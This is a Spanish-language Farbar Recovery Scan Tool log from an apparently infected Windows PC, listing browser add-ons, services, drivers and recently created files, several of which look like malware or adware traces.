Tcpip\..\Interfaces\{DD68EF26-7605-461E-89EA-F338900C8CF6}: [DhcpNameServer] 192.168.0.1
ManualProxies: 1127.0.0.1:8003
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://es.msn.com/?ocid=iehp
BHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> E:\Archivos de Programa\jAVA-AC\bin\ssv.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\OnlineBanking\online_banking_bho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> E:\Archivos de Programa\jAVA-AC\bin\jp2ssv.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\UrlAdvisor\klwtbbho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\ContentBlocker\ie_content_blocker_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Aplicación auxiliar de inicio de sesión en la cuenta Microsoft -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2013-05-22] (EVERNOTE CORPORATION -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [Archivo no firmado]
BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\OnlineBanking\online_banking_bho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\UrlAdvisor\klwtbbho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies SA -> Skype Technologies)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&from=cor&uid=SAMSUNGXHD103SJ_S246J90Z484516&ts=1372918643
FireFox:
========
FF DefaultProfile: 0uh69wgl.default-1567320513344
FF ProfilePath: C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 [2020-01-17]
FF ProfilePath: C:\Users\MrEidrian\AppData\Roaming\Flickr\Flickr Uploadr\Profiles\4jx3zuz0.default [2013-06-24]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Kaspersky URL Advisor) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Virtual Keyboard) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Content Blocker) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Anti-Banner) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Safe Money) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_238.dll [2019-08-14] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.171.2 -> E:\Archivos de Programa\jAVA-AC\bin\dtplugin\npDeployJava1.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.171.2 -> E:\Archivos de Programa\jAVA-AC\bin\plugin2\npjp2.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_238.dll [2019-08-14] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1165635.dll [2012-07-05] (Adobe Systems, Inc.) [Archivo no firmado]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [2013-10-21] (Pando Networks, Inc. -> Pando Networks)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2020-01-17] (Google LLC -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2020-01-17] (Google LLC -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @wacom.com/wacom-plugin,version=1.1.0.10 -> C:\Program Files (x86)\TabletPlugins\npwacom.dll [2011-04-20] (Wacom, Inc.) [Archivo no firmado]
FF Plugin-x32: @wacom.com/wtPlugin,version=2.0.0.1 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2011-05-31] (Wacom) [Archivo no firmado]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3862230028-3041123482-801023079-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [2013-10-21] (Pando Networks, Inc. -> Pando Networks)
FF Plugin HKU\S-1-5-21-3862230028-3041123482-801023079-1000: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2011-05-31] (Wacom) [Archivo no firmado]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\a.js [2020-01-17]
Chrome:
=======
CHR Profile: C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default [2020-01-31]
CHR Extension: (Presentaciones) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-09-01]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2019-09-01]
CHR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-01-17]
CHR Extension: (Chrome Media Router) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-01]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MREIDR~1\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx [2019-01-26]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [npiecjlhkngdinoeekmccdbjdgclmnbk] - C:\Users\MrEidrian\AppData\Local\CRE\npiecjlhkngdinoeekmccdbjdgclmnbk.crx <no encontrado>
Opera:
=======
OPR DownloadDir: E:\Descargas
OPR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
OPR Extension: (FVD Video Downloader) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2019-09-01]
OPR Extension: (SaveFrom.net helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2019-09-01]
==================== Servicios (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
R2 AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [239616 2013-08-30] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-04-29] (Apple Inc. -> Apple Inc.)
S3 AVP; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\avp.exe [356128 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R2 EsgShKernel; C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe [11457840 2019-09-14] (EnigmaSoft Limited -> EnigmaSoft Limited)
R2 EventSvc; C:\ProgramData\EventSvc\eventsvc.exe [360448 2018-07-24] (CloudBees, Inc.) [Archivo no firmado] <==== ATENCIÓN
R2 gupdate; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [360448 2020-01-17] (CloudBees, Inc.) [Archivo no firmado]
S3 gupdatem; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [360448 2020-01-17] (CloudBees, Inc.) [Archivo no firmado]
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-12-12] (Huawei Technologies Co., Ltd. -> ) [Archivo no firmado]
S2 Main Service; C:\Program Files (x86)\MachinerData\ModularInstaller.exe [3076373 2020-01-17] (qweasdsadsad) [Archivo no firmado]
R2 NitroDriverReadSpool11; E:\Pro11\NitroPDFDriverService11x64.exe [327368 2016-12-08] (Nitro Software, Inc. -> Nitro Software, Inc.)
R2 NitroUpdateService; E:\Pro11\Nitro_UpdateService.exe [419016 2016-12-08] (Nitro Software, Inc. -> )
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [71880 2016-12-08] (Nitro Software, Inc. -> Nalpeiron Ltd.)
R3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG -> Nero AG)
R2 NMSAccess64; C:\Windows\SysWOW64\NMSAccess64.exe [82872 2009-01-12] (Numedia Soft, Inc. -> )
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2012-09-04] (Even Balance, Inc. -> )
R2 ShMonitor; C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe [512816 2019-09-14] (EnigmaSoft Limited -> EnigmaSoft Limited)
S2 SkypeUpdate; E:\Archivos de Programa\Skype\Updater\Updater.exe [172192 2013-10-23] (Skype Software Sarl -> Skype Technologies)
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-01-08] (Samsung Electronics CO., LTD. -> DEVGURU Co., LTD.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Archivo no firmado]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
R2 TrustedLogos; C:\Windows\trustedlogos\TrustedLogos.exe [11328 2019-09-19] (Gelbe vom Ei GmbH -> )
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 Windows Indexer; C:\Windows\SearchIndexer.exe [64512 2017-10-13] () [Archivo no firmado]
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
===================== Controladores (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
R1 ab6af3c5e932269c; C:\Windows\system32\drivers\ab6af3c5e932269c.sys [33984 2019-09-01] (BlockChain Advances Ltd -> FsFilter Network)
R3 amdkmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [12528640 2013-08-31] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\Windows\System32\DRIVERS\atikmpag.sys [618496 2013-08-30] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 androidusb; C:\Windows\System32\Drivers\androidusb.sys [32768 2010-04-29] (Microsoft Windows Hardware Compatibility Publisher -> Google Inc)
R3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96256 2013-07-05] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2012-09-01] (DT Soft Ltd -> DT Soft Ltd)
R3 EnigmaFileMonDriver; C:\Windows\System32\drivers\EnigmaFileMonDriver.sys [68424 2020-01-31] (EnigmaSoft Limited -> EnigmaSoft Limited)
S3 ew_usbccgpfilter; C:\Windows\System32\DRIVERS\ew_usbccgpfilter.sys [18944 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R1 ISODrive; E:\Archivos de Programa\UltraISO\drivers\ISODrv64.sys [115600 2010-01-29] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [458336 2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
U5 klflt; C:\Windows\System32\Drivers\klflt.sys [90208 2013-04-25] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [626272 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [29792 2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [29280 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [54368 2013-06-19] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [178448 2013-04-25] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [66800 2013-01-17] (Logitech -> Logitech Inc.)
R3 nusb3hub; C:\Windows\System32\DRIVERS\nusb3hub.sys [96768 2011-10-25] (Microsoft Windows Hardware Compatibility Publisher -> Renesas Electronics Corporation)
R3 nusb3xhc; C:\Windows\System32\DRIVERS\nusb3xhc.sys [213504 2011-10-25] (Microsoft Windows Hardware Compatibility Publisher -> Renesas Electronics Corporation)
R3 RTL8167; C:\Windows\System32\DRIVERS\Rt64win7.sys [187392 2009-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Corporation )
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2017-11-27] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 usbser; C:\Windows\System32\DRIVERS\USBSER.sys [33280 2018-12-12] (Microsoft Corporation) [Archivo no firmado]
S3 wacmoumonitor; C:\Windows\System32\DRIVERS\wacmoumonitor.sys [13312 2011-09-08] (Microsoft Windows Hardware Compatibility Publisher -> Wacom Technology)
==================== NetSvcs (Lista blanca) ===================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
==================== Un mes (creado) ===================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2020-01-31 11:11 - 2020-01-31 11:11 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000000000 ____D C:\ProgramData\S536BIPQ4TQ114GHW03YTCXG2
2020-01-31 11:10 - 2020-01-31 11:10 - 003061248 _____ C:\Users\MrEidrian\AppData\LocalLow\ELQnRq0YvJ.exe
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\Desktop\antes
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\vntlutefrev
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\SolwaySoftware
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\LocalLow\AdLibs
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TVRadio
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files\NJ4SOTTRZH
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files\AUXDGUNQ0L
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files (x86)\TVRadio
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files (x86)\oberonapps
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Program Files\U5EES31B4Q
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Program Files\85E8BNNBEE
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\4plii4obowa
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Program Files\ZWD63K22V7
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Program Files\NPUOW5G9P5
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Program Files\U24HP4O5BP
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Program Files\ERTC7W5OYX
2020-01-17 11:53 - 2020-01-31 11:11 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\GoogleChromeUserData
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Program Files\9B24IF9AQM
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Program Files\6S3KYHHWIU
2020-01-17 11:46 - 2020-01-17 11:53 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication
2020-01-17 11:45 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\Desktop\FRST-OlderVersion
2020-01-17 11:43 - 2020-01-17 11:43 - 000000260 _____ C:\DelFix.txt
2020-01-17 11:43 - 2020-01-17 11:43 - 000000000 ____D C:\Windows\ERUNT
2020-01-17 11:41 - 2020-01-17 11:41 - 000000052 _____ C:\Users\MrEidrian\Desktop\asdf.txt
2020-01-17 11:40 - 2020-01-17 11:40 - 000797760 _____ C:\Users\MrEidrian\Desktop\delfix.exe
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Program Files\YUGF9ZIQK7
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Program Files\WAK3MKKWFC
2020-01-17 11:38 - 2020-01-17 12:05 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-01-17 11:35 - 2020-01-17 11:35 - 000000000 ____D C:\Program Files (x86)\MachinerData
2020-01-17 11:34 - 2020-01-31 11:07 - 000000000 ____D C:\Windows\trustedlogos
2020-01-17 11:34 - 2020-01-31 11:06 - 000000000 ____D C:\ProgramData\EventSvc
2020-01-17 11:34 - 2020-01-17 12:07 - 008021968 _____ (Password Kernel) C:\Users\MrEidrian\updata.exe
2020-01-17 11:34 - 2020-01-17 11:56 - 000000000 ____D C:\ProgramData\NtvHost
2020-01-17 11:34 - 2020-01-17 11:34 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-01-17 11:34 - 2020-01-17 11:34 - 000003510 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\VPNPR
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\AdvinstAnalytics
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Program Files\KHJ98BRLDV
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Program Files\0OP808P0KJ
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Program Files (x86)\Innovative Solutions
==================== Un mes (modificado) ==================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2020-01-31 11:11 - 2019-10-18 11:01 - 000045541 _____ C:\Users\MrEidrian\Desktop\FRST.txt
